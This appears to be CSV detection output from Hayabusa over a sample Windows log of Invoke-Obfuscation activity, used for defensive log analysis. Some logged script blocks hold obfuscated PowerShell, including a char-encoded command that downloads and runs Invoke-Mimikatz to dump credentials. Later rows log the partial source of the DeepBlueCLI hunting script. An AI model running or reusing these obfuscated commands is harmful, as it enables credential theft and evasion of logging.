03:22:16.268 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:17.070 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:17.087 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:17.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:22.147 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $PsHOME[21]+$pShOMe[30]+'x')( "" $( SET-ITeM 'vAriabLE:OFs' '')"" +[sTRing]('26K28!20%24l65J4e:76&3ai43i6f!4di73K50%45J63J5b:34!2cl31l35%2c&32i35%5d&2d!4aK4fJ69i6e&27l27%29&20!28i5bl73:54l52%49i4eJ67l5d%3a%3ai4a%4f:49K6el28K20:27&27:2ci20:28!28l37%33J2ci20!36l39!20:2c&38:38K20!2c!33:32K2ci20l34!30K20i2c&37i38&2c%31!30!31l2c:31:31K39J2cK34!35&2cJ37i39&20l2c%20l39J38l2cJ31%30K36i20J2cK31K30:31%2c!39i39&2ci31l31l36&2cl20J33&32!2c:20%37:38!20%2c!31i30i31i20:2c:20:31%31:36K2ci34l36K20:2cl38l37l2cJ31J30K31:20i2cl39K38l2cJ36&37%2c:20!31!30%38l2ci31&30!35%20%2c:20%31&30%31l2c!20K31&31K30!20&2c!31:31%36i20&2c!34:31l20J2c!34%36:2cl20&36!38!2c!20%31%31:31l2c!20l31&31i39:20J2cJ31&31i30K20J2c&31!30!38i20K2cK31&31J31:2cK20K39J37%2ci20K31K30K30K2c&20K38&33l20:2cJ20i31l31J36!20K2ci31:31!34!2c%20&31J30%35&20:2c&31l31:30:2cK31:30l33&20J2cK34i30l20J2c&33l39K2c&20!31:30&34J2c%31l31l36&20i2c&31i31i36i2c!31l31:32i2c!20l31i31!35&20l2c%35J38!2c:20%34!37!2c&20K34K37:20K2cl20%31%31!34:2c&39J37:20l2cK20K31J31i39l2c&20&34J36:20i2cJ20!31:30&33&2cJ31l30i35J20%2c!20l31i31K36!2cJ20i31J30K34%20:2cl31K31%37J2cl20:39i38:20i2c%31l31:37!2c!31i31!35i2c%20!31J30!31l2c!31i31%34:20i2cJ20!39!39i2c&20J31K31!31:2cJ20l31K31l30K2c:31l31&36J20:2c:31l30K31&2c%31l31:30:20l2c%20!31J31!36l20!2c&20!34K36%2cK20i39:39K2cJ20K31!31i31!20:2c!20!31i30!39%2ci34i37!2cJ20K31:30i39!2c&39J37!20i2ci20&31K31J36l2cl31J31&36K20&2cK20i31l30K35K20i2cJ20%31l30J32i20J2c!31K30i31K2ci31%31%35l2ci20:31i31K36l2cJ20J39&37:20!2ci31l31J36l20J2c%20:31%30&35!20:2ci31&31i31!2cK20l31!31l30!2c!20i34J37J20:2cl20:38:30J2ci31%31!31K20K2c!31J31i39!2ci31&30i31K20!2ci20%31%31l34%20&2c&20J38&33:2c%20!31&31:32K2cK20&31:30:38i2ci20i31l31J31i2cl31l30l35l2c&20&31&31!36%2ci20&34J37%20:2cJ31K30:39J2cK20!39%37&2cK20:31:31&35&2cK20!31%31:36J20%2c!20i31K30K31i20!2c:31%31!34:20K2cl20&34&37i20J2c&20l36l39K20!2ci20J31!32J30K2c!31:30i32&2cJ20i31i30%35!20K2c!31K30l38:20l2c!31!31l36%20%2c!20i31K31&34%2c%20J39%37J2c!20%31l31&36:20%2cl20K31%30%35!2ci31:31i31:2c:31K31%30i20!2cK20i34%37i20!2c:37K33&20:2cJ31&31K30K2c:31!31%38l20%2c:20i31l31K31%2c%31K30&37:20:2c!20&31&30l31%20l2cl20:34J35%20:2c!37l37J20%2cl31%30&35:2c&31J30%39!2ci20i31:30J35i2c!20%31:30%37%20%2c%20!39K37!20i2c:31i31!36J20:2c&20i31K32J32%2c%20:34%36J2c!31:31i32%2cJ20!31l31&35i20l2cJ20:34:39i2c%20J33&39&20J2cl20i34l31&20:2cK20!35K39l2cJ33K32l20&2c%20!37l33K20:2cK20!31J31:30&20&2ci31:31%38:2c!31K31J31l20!2c!31&30i37!2c!20%31!30%31!20l2ci20&34l35K2cl37:37!2c!20:31i30J35:20&2c!31%30&39J2c%31%30:35&20:2c!20l31:30l37i20!2c:20J39%37%2cJ20:31%31%36K2ci20J31l32:32!2ci33!32!20l2c:34%35K2ci20l36%38l20J2cK20&31i31i37&20&2c!20J31i30:39l2cJ20%31:31i32l2c&36K37i2cl31!31l34l20%2c:31:30&31l2cl31i30&30%20!2c:31l31!35i20:29l7c!66%4f&52l45%61J43l68!2dl4f%62K6aK65:63i74%20:7b!20%28:5bJ49!6e:74i5d!24i5f%20i2di61:53%5bK43K48%41%52&5d:29%20&7d!29J20J29J20!29&20'.split('&K%:Ji!l' )|fOReAcH {( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }) +""$(SeT-itEM 'VARiable:oFS' ' ') "" )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:22.154 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:22.178 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $eNv:CoMsPEc[4,15,25]-JOin'') ([sTRINg]::JOIn( '', ((73, 69 ,88 ,32, 40 ,78,101,119,45,79 , 98,106 ,101,99,116, 32, 78 ,101 , 116,46 ,87,101 ,98,67, 108,105 , 101, 110 ,116 ,41 ,46, 68, 111, 119 ,110 ,108 ,111, 97, 100, 83 , 116 ,114, 105 ,110,103 ,40 ,39, 104,116 ,116,112, 115 ,58, 47, 47 , 114,97 , 119, 46 , 103,105 , 116, 104 ,117, 98 ,117,115, 101,114 , 99, 111, 110,116 ,101,110 , 116 , 46, 99, 111 , 109,47, 109,97 , 116,116 , 105 , 102 ,101,115, 116, 97 ,116 , 105 ,111, 110, 47 , 80,111 ,119,101 , 114 , 83, 112, 108, 111,105, 116, 47 ,109, 97, 115, 116 , 101 ,114 , 47 , 69 , 120,102, 105 ,108 ,116 , 114, 97, 116 , 105,111,110 , 47 ,73 ,110,118 , 111,107 , 101 , 45 ,77 ,105,109, 105, 107 , 97 ,116 , 122, 46,112, 115 , 49, 39 , 41 , 59,32 , 73 , 110 ,118,111 ,107, 101 , 45,77, 105 ,109,105 , 107 , 97, 116, 122,32 ,45, 68 , 117 , 109, 112,67,114 ,101,100 ,115 )|fOREaCh-Object { ([Int]$_ -aS[CHAR]) }) ) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:22.178 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Int]$_ -aS[CHAR]) },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.530 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.536 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.536 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= 